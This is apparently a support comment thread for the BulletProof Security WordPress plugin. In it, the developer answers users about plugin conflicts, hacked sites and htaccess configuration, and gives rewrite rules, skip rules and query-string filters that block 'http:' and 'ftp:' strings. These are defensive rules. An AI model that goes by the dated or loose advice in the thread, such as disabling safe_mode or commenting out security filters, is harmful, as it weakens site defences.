Ok so your current root htaccess file looks fine right now, but that custom permalink issue needs to be fixed and then once you re-enable Super Cache you are going to see that the WordPress section of code will be moved to the bottom of your htaccess file with additional htaccess code that Super Cache will right to this file once you re-enable it ONLY if you are using the mod_rewrite to serve cache files option.
If you are not using mod_rewrite to serve cache files. (Recommended) with Super Cache then no htaccess code will be written to your current root htaccess file. This is much faster so I recommend it, but then you will have to make the manual root htaccess file modifications
Hi guys,
I’ve just installed BulletProof Security and have one little problem. Whenever I try to make a backup I get a warning saying that it wasn’t able to copy the file to “/home/username/public_html//wp-content/bps-backup/root.htaccess”. Folders are created and CHMODed correctly but it insists on inserting the double slash after public_html. Should I fix this by hand?
Thanks in advance!
The double forward slash is ok and will be interpreted as a single slash. Most likely the problem is that safe_mode is on. If safe_mode is enabled by default on your web host you can turn it off in your php.ini file by adding safe_mode = Off. safe_mode is a feature that never really worked and is being completely phased out. it is a feature that only causes problems for legitimate referrers and is very easily bypassed by a hacker so it never really worked as intended anyway.
If your web host does not allow you to turn off safe_mode then you may not be able to use the automated backup and will have to do manual backups. Double check your folder permissions for your /wp-content folder. /wp-content should have 755 permissions. Thanks.
Has Bulletproof Security been tested with autoblogging software such as WP Robot3 or Autoblog Samurai? I am using WPRobot3 and it stopped working once I started using Bulletproof Security. Can you please test with WPRobot3 and let me know?
Thank you.
Ok thanks I will put it in testing.
Dear AITpro,
I have installed the plugin, but as soon as I activate Website Root Folder .htaccess Security Mode, some of my images no longer get picked up by my Simple Lightbox plugin. As soon as I restore my .htaccess, it works again (it has been restored now). I think it is mostly the older images that have this problem; newer ones get picked up fine. The BFS plugin looks like something I’d really want to use, but I really need that Lightbox plugin to work. Is there anything I can do?
Kind regards,
Veliremus
Are you talking about the SimpleViewer Flash gallery on your site that loads from the Images link? I do not see that you have a lightbox plugin in use. I see several gallery plugins, but no lightbox. Please add a comment with the specific problem details and a link to the plugin on the Plugin Compatibility and Testing page and i will test it. Thanks.
Hey, thanks for your quick reply! No, I’m talking about the Simple Lightbox plugin. But guess what? I managed to fix it myself. In the plugin settings, there is an option called “Validate Links”. It was turned on, but the tooltip said that the default is Off, So I turned it off, and turned on BPS. All images now work properly, on the entire site.
I hope this is not a temporary thing, but I have tried in multiple browsers and it does seem to have been fixed. I’ll check back if things change, but I’m good for now!
Hello, I already installed this plugin, but Google keep send me messages that my site was Notices Suspected Hacking on [link removed by Ed]
And as you can see, when you search my domain in Google, my site was labelled “This Site May Be Compromised”. Is there any problem with this plugin or problem in my setting?
Well first off the load time of your site is terrible. The facebook social plugin popup takes minutes to complete and drained all of my system resources, freezing my browser until loading was finished. I’m not sure if this is due to a misconfiguration of the plugin or if this plugin is supposed to work this way. I noticed that it appeared that individual facebook requests were being processed in my status bar. This is very bad. The plugin should load, but i don’t see why you would have to wait until individual facebook connections had completed and actually this should not be happening at all. These appear to be redirects like a hacker would do your site. Google most likely is sending you the message because it sees your site as possibly being hacked due to the social plugin popup you are using. In general what Google is telling you is that your site has a problem. I can confirm that as well because i visited your site. When i come across sites that cause the problems i just mentioned above then i will block the sites permanently in my browser so that i never accidentally click on those website links again. This is definitely something that you don’t want. If visitors never return to your site because of load problems then you will lose a lot of visitor traffic. BPS is primarily designed for security, but you can add htaccess coding to speed up performance for you website. In this case though there is nothing BPS can do to correct the problem that is currently happening on your site. It is a performance issue not a security issue. Also in general when i come across websites that have forced popups i never visit them again. Thanks.
Are you sure about that modal dialog plugin (facebook popup)? There is no any hacking activity on my site? Thankfully 🙂
Your other comment was flagged as Spam because there were too many links in it, but i am able to view the message that Google sent you. This is an all-purpose general message. The only unusual thing that i saw in the link that Google is saying is an example is that it appears you have some sort of additional courtesy search feature setup. To Google this might look like a suspicious thing because the request is being reprocessed again, which kind of resembles a certain type of hacking method. You may want to take a look at the courtesy search coding or configuration and see if you really need it. Typically a simple 404 is all you need. There really isn’t any need to attempt to research something that is going to generate a 404 twice. I have run some tests on your site and manually looked at your coding and I do not see any suspicious coding on your site.
Also your facebook plugin may be fine, but Google may be seeing in your case that the 3rd party links to facebook are also an issue. Normally Google will not be triggered to flag a site as potentially hacked, problematic or a spam site if a few redirects exist and especially to a legitimate website like facebook. It is the extremly large number or http requests acting as redirects that is occurring that could be causing Google to flag your site as having a problem. What you need to keep in mind is that Google has 100’s of these types of general automated emails that they will send out. They cannot and will not specifically look at your particular individual website. This message is triggered automatically because you have things going on on your site that Google does not like.
Also in the automated message that Google is sending you they are warning you about Spam in regards to the additional courtesy search feature that you have set up so basically Google is just telling you they don’t like something that is happening on your site that they consider to be a form of spam or spamming. It is triggering automatic flags.
OMG, manually check? Thanks!
Now I will request considerations from Google 🙂
For your informations, the Modal Dialog Plugin only work for the first time visitor visit my site, and will not show up for the second times, until they clean up their cookies and history. I also use the WP Total Cache to improve my site performance. I also already test my site performance with many online tool, and my site loading in my homepage results is 1.8 seconds, before I use the WP Total Cache, my site performance is 3.5 seconds and above. After that, the other factor is, the location of my hosting server is in Malaysia. That may caused the slow load page to you.
Anyway, thanks for the quick support, Im really2 appreciate that. Cheers.
Ah. I just pinged your site and yep I am getting 4 times the normal response time so there must be a relay lag somewhere. 😉 Still you might want to rethink having a forced popup displayed to visitors. Like i said I never go back to sites that force a popup….ever. 😉
Pinging ohsyok.com [110.4.45.105] with 32 bytes of data:
Reply from 110.4.45.105: bytes=32 time=230ms TTL=45
Reply from 110.4.45.105: bytes=32 time=258ms TTL=45
Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
Reply from 110.4.45.105: bytes=32 time=318ms TTL=45
Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
Reply from 110.4.45.105: bytes=32 time=230ms TTL=45
Reply from 110.4.45.105: bytes=32 time=229ms TTL=45
Thanks.
Even tho i have BPS installed someone was able to inject a code into my wp-config file and highjack my google results. Please advice i cleaned the wp-config allready. but what can i do to protect myself. Its the second time i got hit . first time was without BPS , second one with BPS 🙁
what chmod is recommended for wp-config?
please help me!
thanks,
roy
It is possible then that the first hack of your website placed a backdoor on your site, which means the hackers are already past or inside of BPS security protection. BPS can only protect you from being hacked. If a backdoor is already in place on your site then BPS cannot protect your site. Are you sure you activated BulletProof modes? Also i would like to take a look at your site so either send me your URL in private (use the contact form) or post it here. You would not need to do anything with chmod because the BPS FilesMatch filter does not allow anyone to edit the wp-config.php file – even you – unless you have added your IP address to the root htaccess file first or if you are editing the file via FTP, WP or your CP. So in order for someone to inject code they would have to hijack the root htaccess file itself, which is also protected against any editing – even by you – unless you add your IP address to the file first or if you are editing the file via FTP, WP or your CP. It is very unlikely that a successful injection occurred if BulletProof Modes were activated so more likely a manual edit was done by someone who has your FTP, WP or CP Web Host password. Since your site was already successfully hacked once you should install Exploit Scanner and make sure that your site is really “clean” of malicious code and then change all of your account passwords. Also the SQL Injection filters block every possible SQL command that can cause damage or irritation from being executed on your site directly. If your Web Host’s SQL Server was hacked itself then BPS can only offer limited protection to stop any serious damages from occurring to your site, but minor irritating injections could penetrate all the way to your site’s particular DB. Thanks.
Hey, first of all i really love this plugin.
Only i have this problem with wp-js-external-link-info plugin. it stops working when i have BPS activated.
Wp-js-external-link-info Plugin basicly sends all external links to a special info page (on my domain) with information about leaving the blog. the plugin send to the info page like this:
mydomain.com/redirect?url=www.externaldomain.com
but now it gives me 404 or forbidden when i click any external link.is there anyway i can add a rule or something in the .htaccess so the extenal info page will still be reachable? When i turn of BPS and restore default .htaccess wp-js-external-link-info plugin works again….
Please please please help me…
THANKS!!
Hi this plugin is very poorly documented. I’m not sure what you are supposed to enter on the options page to configure it. The redirection method being used is an outdated HTML redirection method – meta http-equiv=”refresh” this is not the best way to redirect a page or site. The best method is to use a 301 redirect in an htaccess file. So you could use BPS to handle your redirects. Please take a look at this page for information on redirection and it also contains info on adding 301 redirection to htaccess files. The plugin author should change his old outdated html redirection method to the PHP redirection method.
Redirection Methods for all platforms
You may want to experiment with creating skip rules or allowing a string to bypass the BPS security filters. Since I don’t feel that this plugin meets acceptable safety standards and approved redirection methods I am not going to troubleshoot it any further. Thanks.
thanks for the awesome fast reply! i will try that. thanks!
Cool. I noticed that on the link I added to my last comment that they are telling you to add Options +FollowSymLinks in an htaccess file. You most likely do not need to add this for your particular web host and it will cause 500 errors that will make your site not load so DO NOT use Options +FollowSymLinks. If for some reason your redirects are not working you can try adding it, but 99% of all host already have this htaccess directive set by default. The other thing about why you should not use that old HTML redirection method contained in that plugin is because Google officially discourages that type of redirection method and your site could actually get penalized by Google and the other Search Engines for using it. Thanks.
All you need to add to the root htaccess file would be this to redirect an old page to a new page.
redirect 301 /old/old.htm http://www.your-domain-name.com/new.htm
And to redirect an old domain to a new domain.
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www.old-domain-name.com$[OR]
RewriteCond %{HTTP_HOST} ^old-domain-name.com$
RewriteRule ^(.*)$ http://www.your-new-domain-name.com/$1 [R=301,L]
hi, yes it contains a redirect but im not using it all its more that i use the plugin to send external links to a “page with the external link in an iframe” and then i pull the external url on that warning page with a simple GET command like this:
[link removed by Ed]
this it how my page looks like ( the one i am sending external links too):
used to work perfectly but it gives me a 404 error when i have BPS enabled.
please advice what i can do to make this page reachable again.
thanks!
hmm well BPS is probably blocking the iframe then too. The combination of the outdated HTML refresh method (that is officially discouraged by Google) that is being used and the method you are using for the iframe simulates hackers methods very closely so if you don’t get a penalty from Google i will be very surprised. I am not going to troubleshoot this plugin because it is doing something that Google does not approve of. Be careful with using iframes coding. Hackers love iframes coding because it is so easy for them to hack. So be sure to create the additional security coding that you should be using if you want to use iframes coding. I would like to help you, but do not want to give you a solution that will open up your website to hackers. 😉 That defeats the purpose of website security. I’ll give you a hint though. There is an iframe filter in BPS that you can comment out. Let me know how long it takes before your website is hacked. LOL What needs to happen first is the approved methods of redirection need to be used, and used correctly. Then you can write the additional security code to secure your iframes from hackers. If you just add some iframes coding to your website without security coding to protect it then it is only a matter of time until your site gets hacked.
Hello! I have been suffering from the Pharma Hack for almost a month now. I get rid of it, put in security measures, and it comes back. I finally had to reinstall my entire blog. I installed wp-firewall, wp-malware, captchas, everything and just this week it has come back!
I found your plugin and installed it, then went through a deleted the evil codes within my directory. They are these random scripts that the Hack puts in throughout random folders in my directory. I deleted all of them…I think. The only problem I ran into was that when going through the bulletproof folders I found two of these codes. One I deleted with no problem. The second had an error message back on the bps page within my blog. The file I deleted was in the language folder and it was titled wp-cache.class.php. The reason I deleted it is because it had the same mark as the other evil files I deleted. I’m no longer getting and warning message and I wanted to make sure everything was ok. Was this really an evil file? If not, how do I get it back? Thanks for your time and help, and I pray bps works for me! If not…I don’t know what I will do.
The first thing to eliminate is that you are not using a pre-hacked Theme. Meaning the Pharma Hack is already included in the Theme. Take a look at this post >>> WordPress Pre-hacked Themes
Then you want to make sure that you have really removed all of the hackers code from your site. If you are not already using Exploit Scanner then i recommend installing it to scan your site for any hackers code. If you found the hackers code or files in the BulletProof Security folders then they are already in your site. BulletProof will protect your site from all hackers trying to hack your website externally, but not if they have already hacked your website and are working internally or you are using a pre-hacked Theme then BPS cannot protect you because they are already inside your site. BPS Pro does have disaster recovery utilities, but the Pro version will not be available until June. The file name wp-cache.class.php is not a valid BPS file name so if you found this in the BPS folders then it was injected there by the hackers script. This also means that the hackers are already inside your website and control your website internally. Most hacking scripts are automated – once the script is inside your website it will run automatically at regular intervals to inject its payload. Or even worse – insert a backdoor where the hackers can access your site any time they want. You may want to consider performing a full backup of your site and then restore your website back to a time when you know your website was not hacked. You would also need to change all of your account usernames and passwords. Without a URL to your website included in your comment I cannot eliminate your Theme as a pre-hacked Theme. Thanks.
Thanks for the reply. You are correct, I was infected before installing BPS. As far as I can tell, my theme is ok. You can check it here if you would like [link removed by Ed]. I got it from the wp main site and tweaked it.
I don’t know a lot about code or hacking, so I am over my head here. I don’t know how to check backdoors. I used the scanner you suggested and it gave me information, but I don’t know how to tell what is malicious or not. I’m completely lost and am starting to think that paying someone to fix this would save me a lot of headache. However, I would prefer not to do that if possible.
Will the BPS Pro be able to locate and fix the internal problem? I’m almost positive that is what’s going on here and I don’t know what to do. Again, thanks for your valuable help!
*** UPDATED ***
Actually i just took a closer look and all those Viagra links are pointing internally not externally. This looks more like a prank attack by someone who has access to your WordPress site. Try changing all of your account passwords and DO NOT store them on your computer. Then correct the menu links and other links and see what happens. To me this looks more like an inside job done by a prankster.
That particular Theme (Wasteland) you are using is 3 years old so you could go to the Cloisters site and get a more recent version of that theme. I see they have a version from 2010. I downloaded the Theme from the repository and it does not have any malicious code in it, but it is a very stripped down Theme. I did not go through the entire coding. I just ran a scan on it, but i did look at sections of the code in the Theme and it is very, very basic. My personal opinion – not a safe Theme to use. You know you can make any Theme visually look the way you want it to look. The visual part of a Theme is just a skin so it is better to pick a Theme that is poplular that comes with a lot of bennies, updated recently, updated frequently with extensive Theme coding and then just change the visual appearance of that Theme. I hate to tell you this, but your site is completely owned by the hackers. I see viagra links all over your site. Where they are appearing tells me that your site is completely under the hackers control. My honest opinion – back up all your posts and anything else you want to save. Create new usernames and passwords for all your accounts – web host, FTP and anything else. Wipe this site out entirely. Install a new installation of WordPress again and load a brand new Theme. Import your backed up database to the new databases after carefully going through your DB tables and data to ensure that they everything is legit. Or if you don’t want to the challenge of going through your old DB you can just manually copy all of your posts and manually paste them back in. If you want to have someone salvage this site for you it will take quite a lot of work. I am currently overbooked otherwise i would offer my services to you. A fair price would be somewhere around $400 because it will take around 10 hours to salvage it. Maybe you can do this – backup your entire site and DB and then contact your web host and ask them to restore your site to a time when you know it was ok. BPS Pro is a long way off from being finished. Everything that i am automating in BPS is what i would do manually as a human to recover a hacked site. I wish you the best of luck and i am very sorry. Having your website hacked is a terrible experience.
Sincerely,
Ed
Thanks so much for your help Ed. I’ve completely deleted and reinstalled my blog, changed all my user names and passwords. For about a month it was fine, now it is back again. I’m not sure how someone has access to my site. No one uses my computer but me. It still happens even though I constantly change my passwords. Every so often new “users” will appear. Sometimes they have a user name similar to mine, other times they have “google” in them. I had set my security settings to not allow users to register, but somehow they are still doing it.
Going back through my whole website today I found that there was code in pages that were not part of my blog. They do not show up in Google cache like the blog does, but they were still there “behind the scenes.” This has been a horrible experience, but I really appreciate your help.
Dear AITpro,
First I just wanted to say thank you for creating such a wonderful BulletProof Security plug-in!!!
I just recently updated BulletProof Security to V.46.1 and noticed that my BackupBuddy plug-in stopped working… when I activated [default mode] the BackupBuddy plug-in works fine. But when I activated the [bulletproof mode] the plug-in stop working properly. When I go to PluginBuddy > Backups and click full backup button, it makes a backup and then shows me 404 error (page not found) but the soon as I activated [default mode] plug-in works just fine
Please let me know how I can fix this
P.S. Previous version of BulletProof Security work just fine with this plug-in
Thanks!
John B.
Sounds like you have not activated BulletProof Mode for the wp-admin folder. I can’t think of any new coding in version .46.1 that would be affecting this plugin. let me know if it was just not activating BulletProof Mode for the wp-admin folder. If not then I’ll put this plugin in testing. Thanks.
I messed up when updating the latest version of BPS. I deactivated the plugin, and then updated it through the automatic update option in the admin area, and when I reactivated the plugin I got an error that said:
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 378440 bytes) in /home/mysite/public_html/wp-admin/includes/admin.php on line 31I removed the plugin and still get the error. I renamed the plugin folder and it removed the error, but I got the error again after renaming the plugins folder back again. How can I remove the error and update BPS properly?
Typically you will get these types of fatal errors when you try to perform something that causes a particular function to fail. An example would be if you were trying to upload an image that was beyond the capabilities or limitations of your website or a particular function. Or the error could actually be accurate and you just happened to run out of PHP memory when installing BPS, you have a memory leak issue or possibly you are not running PHP5?. See this WordPress Codex Editing_wp-config.php – Increasing_memory_allocated_to_PHP PHP5 should have 128MB allocated by default and the error is saying you only have 32MB. Try the WordPress fixes suggested in the link above or if you have access to your php5.ini on your web host then you might be able to increase your allocated memory limit to 128MB by adding this directive to your php5.ini file
memory_limit = 128M
I have my memory limit set to memory_limit = 256M
let me know what happens. Thanks.
Hi,
Please HELP!
Every time when I try to activate Bulletproof Mode each page on my website will give the same error: Internal error. My provider is One.com and I’m using WordPress 3.1.
I did exactly what is in your guide. I watched your video tutorial. As far as I know I did nothing wrong.
Thanks,
Jack
Hi,
The video tutorial shows how to add your subfolder name for WordPress installations that are in a subfolder. Your WordPress website is installed in the root folder of your website domain so you would not need to add anything to the RewriteBase and RewriteRule in any of the .htaccess files. My guess is that you added your domain name /oculary/ to the .htaccess files, which is causing a 500 error. Thanks.
NO! I didn’t add my domainname to the .htaccess files.
Thanks.
I googled your host in regards to htaccess files and i see that you must make sure that # Options +FollowSymlinks is commented out with the # sign in front of it and you must also comment out Options -Indexes with a pound sign like this # Options -Indexes. Please contact tech support for you web host and ask them what other special requirements they have for .htaccess files on their hosting and also ask them if the php.ini file on their web hosting will interfere with .htaccess files on their hosting. You have permalinks enabled and are running PHP5 on your WordPress site correct? Thanks.
From my host is following information…
Supported: Password protection, IP filtering, custom error pages (404, 301, 302, 500, 501 etc.), protection against hotlinking, mod_rewrite (e.g. Friendly URLs / Clean URLs), DirectoryIndex – A good link: Javascript Kit
Not supported: Everything starting with Options, php_value, ForceType, AddHandler and SetHandler.
They say: unfortunately, our php.ini file cannot be edited except for error reporting and register globals.
And: You can view the following link for our server setup with the PHP configuration
http://one-docs.com/specs/
Is there a solution for Bulletproof with this provider? Or is it definitively not compatible?
Thanks.
You are good to go. You just need to comment out or delete the Options -Indexes line of htaccess code that is in all the master .htaccess files and then activate BulletProof Modes.
Add a pound sign # in front of Options -Indexes to comment it out (shown below) or you can just delete it.
# Options -Indexes
Thanks
Hi, sorry, I must have had an offday. I thought I added a pound sign before ‘options’, but I missed some. Excuses again. It’s ok now!!! Thank you!
Cool glad you got it working! 😉 Yep off days are no fun. I usually turn off my computer and go to the beach before I do any damage. LOL I will remove this Directive from the htaccess files in the next version release of BPS. This was added by request and I never felt it was necessary and now that it has caused a problem it is history. Have a great day!
hello again!
is the order of the rules in the root htaccess important?
when i added the WP Super Cache plugin, it wants to move the WP permalink stuff below the BPS entries, then add itself between the two.
The only thing that is important as far as order goes in the root htaccess file is that the Query String Exploits filters are the last code in the htaccess file. The FilesMatch section of code (very last bit of htaccess code) could go anywhere in the htaccess file, but I just chose to stick it at the end of the file.
thanks for that – i didn’t see it in the docs anywhere, but i might have missed it
i’ll tell the WP Super Cache guys about this because they’re changing the order
Hello! I just installed your WordPress Bulletproof security plugin after having to reinstall my whole blog due to being hacked, so I’m just getting acquainted with it. I also installed WP-MalWatch just in case. Anyways. According to MalWatch, in the /public_html/wp-content/bps-backup/.htaccess file there, this appears in the content of the file:
order deny,allow
deny from all
allow from 75.22.47.234
Now, that isn’t my computer’s IP, and I dont know if I am super paranoid or i dont know but I want to know, if I didnt add that rule, why it’s on my backed up .htaccess file. I manually deleted it via ftp, just in case. Maybe this is a very stupid question, but I’ve spent almost three days fixing this website and I really would appreciate it if you could help me out.
Thank you for your help.
Robbie.
Hi,
That was the current IP address of my computer at the time I was testing enabling downloading of files from the bps-backup folder. That IP address has since been changed by my ISP 100’s of times via DHCP. This was just a nick nack that I forgot to remove on the last release of BPS. When you click the Enable Backed Up File Downloading button on the BPS upload/download/edit page it will write a new htaccess file with whatever your current IP address is now. IP addresses change very frequently since they are randomly and automatically assigned via DHCP by your ISP. Any way this is nothing to worry about. The allow from 75.22.47.234 line of htaccess code was just something that should have been removed after testing, but it was missed. Someone would have better odds of winning the lottery then guessing and spoofing that particular IP address to download your backed up BPS master files. You want to make sure that there is a deny all htaccess file in your bps-backup folder so just click the Enable Backed Up File Downloading button on the BPS upload/download/edit page and a new htaccess file will be written to the bps-backup folder with your current computer IP address. Thanks.
BPS “Update File” (.htaccess) 404 error (minor)
BPS .46
WP 3.1
LAMP
hi Ed – this is unrelated to the eShop fix (and i’ll get back to you on that i promise)
i was able to use the BPS interface to edit these files before, but i have no idea why it’s not working now – obviously something changed.
i read a few pages with information on this and here’s what i did to try and resolve the problem:
* verified theme path (which i knew was correct)
* CHMOD BPS backup and admin\htaccess dirs 755 (the backup dir was 750 by the way)
* switch to the default root .htaccess
* tested the “update file” button on the edit theme UI – works fine
* auto-reinstall WP core files
the address i’m being directed to when clicking “update file”:
http://my_site/wp-admin/options-general.php?page=bulletproof-security/admin/options.php#tabs-5
no hurry on eShop – I am slammed with work. LOL I won’t be able to do any plugin testing until Sunday. It sounds like you might have some white space where it should not be in the htaccess files. White space is ok between code lines and code fixes, but within a code line you must have the exact spacing that is required. In some code lines a single white space is required and if you added 2 white spaces then you would get 404 errors or even 500 errors.
Yep the 750 thing was a mistake on my part. Forgot to add CHMOD 755 in the previous release of BPS. So maybe you should download copies of the BPS master htaccess files then remove BPS entirely and then reinstall BPS. Thanks.
i’m under the impression you need a blank line at the end of .htaccess and there wasn’t one in 2 of them… there is now.
regarding spaces, i removed the double spaces i knew were safe to remove – they were in code i stuck in there.
there are double spaces (not tabs) in some of the default BPS lines and i don’t know if there’s supposed to be, but i’m guessing you know what you’re doing FAR more than dummy me 🙂
here they are between ‘:’ and ‘[‘
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
i haven’t yet found any other problems in the .htaccess files and “update file” button is still bUSt3D!!!
if you don’t have any off-the-top-of-my-head suggestions, don’t sweat it. the problem is likely something i buggered up
oh… here’s the core of the .htaccess in the root – maybe you can spot something wrong
# i stuck this in here – i did have 4 spaces before all the Rewrite’s
# redirect all https to http
RewriteEngine On
RewriteCond %{SERVER_PORT} ^443$
RewriteRule ^(.*)$ http://%{HTTP_HOST}/$1 [R=301,L]
# BEGIN WordPress
RewriteEngine on
RewriteBase /
RewriteRule ^download/([^/]+)$ http://12bytes.org/wp-content/plugins/download-monitor/download.php?id=$1 [L]
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
Looks like you are rewriting SSL, to HTTP, but the rewriterule does not look valid. I’m not sure what the download monitor rewriterule is all about. In any case you have some more advanced stuff going on so you should check the askapache site for excellent htaccess tips. I eventually plan on adding a bunch of htaccess tips and tricks on my site, but right now there is nothing. Thanks.
WP 3.1
BPS .46
LAMP
hello!
i think – not sure – there may be an issue with BPS and PayPal IPN???
i’m using eShop http://wordpress.org/extend/plugins/eshop/ and it isn’t sending any emails to me when orders are placed and the orders are always marked as “pending” (i do receive WP emails for comments, so i think the WP mail function is ok).
the fellas at eShop seem pretty confidant with their script and think this may be a plugin conflict. i read on this site where it was suggested to stick a default .htaccess (less the rule for denying access to wp-config) in the IPN directory, which i did, but the orders are still marked as “pending”.
i’m wondering if anyone has used eShop with BPS and could offer some tips?
Yes there is an issue with PayPal IPN. And yes the workaround was to add a default htaccess file to the folder where the IPN script is. This is an issue that i had meant to add to the compatibility testing page, but it got forgotten. I will add it so that a permanent fix can be implemented into the secure.htaccess master htaccess file for future releases of BPS.
Yep their code is most likely solid, but typically plugin testing is not done in a secure htaccess environment so i will add this plugin to the compatibility testing page.
I think you probably have 2 issues. 1 with IPN and then 1 with eShop. I have quickly glanced at the eShop architecture and the pament gateways made be bundled into the plugin files so i am not sure if this would include IPN as well. For now try this. If IPN is in a separate folder – Add the default.htaccess file to the folder that contains the IPN script and rename it to just .htaccess (removing default from the file name). If the IPN script is contained or located in the plugin folder then just add this htaccess code below to Your Current Root htaccess File using the built-in BPS File Editor. You can copy and paste directly to your Root htaccess file and update it.
# eShop test fix - pending verification that it works # If you have WordPress installed in a subfolder you will need to add the # subfolder name to the RewriteCond /blog/wp-content/plugins/eshop/ [NC] RewriteCond %{REQUEST_URI} ^/wp-content/plugins/eshop/ [NC] RewriteRule . - [S=30]Let me know if this works. I will do further testing in a few days. Thanks.
Also a lot of people then ask if the store will not be securely protected. I would hope that the plugin already has security built into it or is just handling connecting you to secure servers otherwise that would mean that the plugin was released without any security and that would obviously not be a good thing for a plugin that is dealing with sensitive personal information. 😉
Ed
Ed, thank you much
i will get back to either way
regarding the eShop fix – i don’t know if it works or not as PP IPN apparently still was not connecting to my site.
i finally got disgusted with it dumped the plugin.
Sorry i have not been able to get to this – on hour 23 working straight and no end in sight. AHHHHHHHH!!!!!
23 hours?
jeez Ed, you’re wasting an hour somewhere!
just wanted to let you know that i didn’t intend the “i got disgusted” comment to apply to you 🙂 i got disgusted with the lack of support from them.
having said that, i may try eShop again :/
if so, i’ll get back to you
ha ha good one. I don’t know how long a human can go without sleep before completely losing it, but I never want to work 38 hours straight ever again in my life. I met the deadlines i was supposed to meet, but it took a toll. I was not right for 2 days after that.
I temporarily removed eShop from the plugin testing list because i was not going to be able to get to it any time soon. Caching, Image Thumbnailing, Login; Password Resetting. Password Strength indicators, Login redirections are all good to go now overall so it is time to focus on the whole eCommerce plugin arena. What i need to do is make a list of the primary strings that are used in eCommerce plugins so i can test each string for issues and create general htaccess rules for them to cover potential problems on a larger scale. The other issue with eCommerce plugins is I see that a virtual directory or actual separate directory is used fairly often and of course then there is the issue of payment gateways. So that is the next area that needs to be looked into. I think what I will probably end up doing is creating another BulletProof all purpose htaccess file made specifically for eCommerce plugins. This way people can just add it to the actual directory or if it is a virtual directory then add the eCommerce specific htaccess code to the root htaccess file.
Hi Ed,
I can not delete plugins, templates or edit and add widgets to my sidebar. When I try to delete it brings me to 404 error page of my website. Is there some conflict with the bulletproff pluging ? Appreciate the help.
Thank You,
Sean R.
Hi Sean,
You just need to activate BulletProof Mode for your wp-admin folder. Thanks.
Ed
Appreciate the help Ed. I have another issue with a clients site kaimanashells.com everything works fine but the product images do not display after the install ? how do I get them to display ? Thanks in advanced.
Thank You,
Sean R.
Hi Sean,
This is a image thumbnailer issue. The image thumbnailer for this site is named phpThumb so just change the name in the TimThumb fix in your Current Root htaccess File using the built-in BPS File Editor. Thanks.
# TimThumb Thumbnail Images not displaying - Red X instead of Images # If your theme uses TimThumb and the file is called something else like thumb.php then change the filename below RewriteCond %{REQUEST_FILENAME} phpThumb(.*) [NC] RewriteRule . - [S=30]Hi Ed,
Thanks again. How would I change the file name do you have an example ? and where can I find the image thumbnailer in the theme ?
Thank You,
Sean R.
Hi Sean,
Yeah the code in the previous reply has the correct name of the image Thumbnailer that your Theme is using. To find the image Thumbnailer location on your website you would right mouse click on any of the images that are showing a red X instead of the images and then click properites. This will give you the full path to where the image Thumbnailer is located on your site. You will be changing the name of the Thumbnailer in the BPS file – the htaccess fix for this. You are not actually changing the name of the Thumbnailer file itself. Click on the Upload / Download / Edit menu tab on the BPS Settings page and then make the edit shown in the previous reply to Your Current Root htaccess File Thanks.
Ed
Hi Ed,
Sorry you had replyed on the other post RE: image issues. What was I thinking ? too many brown bottles 🙂 will upgrade in the near future, also for my offline clients. Outstanding support you have a customer for life.
Thank You,
Sean R.
Hi Sean,
I’m jealous on the brown bottles. Would that be Guinness by any chance – my favorite! My day off is Sunday so I unfortunately have to behave until Saturday night. Phooey. Thanks.
Ed
I’m having a problem with the bulletproof plugin and an email program I use. It’s blocking me from getting to the admin area. I will re-look at this again after you do the videos and I have more time, but right now I need to delete it and get some work done. What files have to be deleted? I deactivated the plugin and deleted, but noticed the htaccess was still bulletproof#46, etc. I have an original htaccess backup. Please tell me what files need to be deleted. Thanks
Hi Ben,
Also you need to have BulletProof Mode activated for your wp-admin folder or else things like adding / removing widgets and getting into other plugins options and settings pages will be blocked.
The video tutorial has been completed you can view it here >>> http://www.ait-pro.com/aitpro-blog/2481/bulletproof-security-plugin-support/wordpress-security-bulletproof-security-setup-bulletproof-security-wordpress-subfolder-installation/
To generate and use the default htaccess file that WordPress creates for you, you would just need to update your permalinks and then remove all other htaccess code in Your Current Root htaccess File using the built-in BPS File Editor. The htaccess code that WordPress generates starts with # BEGIN WordPress and ends with # END WordPress. You can then remove all other htaccess code that pertains to BulletProof Security ie the security filters that protect your website from hackers. If you deleted the BPS plugin then you will have to use the traditional method of modifying WordPress htaccess files – FTP to your website, download the htaccess file in your website root folder and make your edits and then upload back to your website root folder. Thanks.
Ed